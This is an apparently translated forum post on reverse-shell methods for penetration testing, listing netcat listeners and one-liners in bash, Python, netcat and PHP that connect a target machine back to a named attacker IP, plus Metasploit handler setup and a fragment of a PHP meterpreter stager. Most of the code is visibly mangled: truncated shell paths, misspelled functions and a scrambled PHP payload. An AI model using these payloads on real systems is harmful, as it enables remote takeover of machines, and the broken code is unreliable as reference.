By HireHackking in HACKER
· 1 view
In our penetration testing process, the most commonly used one is to rebound a shell based on the tcp/udp protocol, that is, reverse connection.
Let’s first talk about what forward and reverse connections are.
Forward connection: Our machine connects to the target machine, such as ssh and mstsc
Reverse connection: The target machine connects our machine
So why is reverse connection more commonly used
The target machine is in the LAN, and we are not able to connect to him
The target machine is a dynamic IP
The target machine has a firewall
Then let me talk about my experimental environment
Attack aircraft: Kali Linux: 47.98.229.211
Victimized machine: Centos 7: 149.129.68.117 (Ali Cloud Server)
Position 1
is also the most common way
Kali Monitor
nc -lvvp 4444centos run
-i /dev/tcp/47.98.229.211/5555 01 After executing the command, it successfully rebounded!
Position Two python
Attack aircraft Kali or monitor
nc -lvvp 5555centos execution
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('47.98.229.211',27409));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/','-i']);'
Pose three nc
If there is nc on the target machine and the -e parameter exists, then a reverse shell can be created
Attack aircraft monitoring
nc -lvvp 5555 target machine execution
nc 47.98.229.211 5555 -t -e /bin/This will bounce the target machine's /bin/to the attack machine
However, many Linux NCs are castrated versions. If the target machine does not have NC or does not have the -e option, it is not recommended to use NC methods.
Pose Four php
Attack aircraft monitoring
nc -lvvp 4444 requires the target machine to have php and then execute
php -r '$sock=fsocopen('172.16.1.130',4444);exec('/bin/sh -i 3 3 23');'
Some other high-energy operations
About PHP payload
Now perform simple configuration in msfconsole
msf use exploit/multi/handler
msf exploit(handler) set payload windows/meterpreter/reverse_tcp
payload=windows/meterpreter/reverse_tcp
msf exploit(handler) set LHOST 192.168.1.107
LHOST=192.168.1.107PHP?
php error_reporting(0); $ip='x.x.x.x'; $port=53; if (($f='stream_socket_client') is_callable($f)) {
{$port}'); $s_type='stream'; } if (!$s ($f='fsocckopen') is_callable($f)) { $s=$f($ip, $port); $s_
strlen($b)); break; case 'socket': $b .=socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock']=$s;
$GLOBALS['msgsock_type']=$s_type; if (extension_loaded('s
Recommended Comments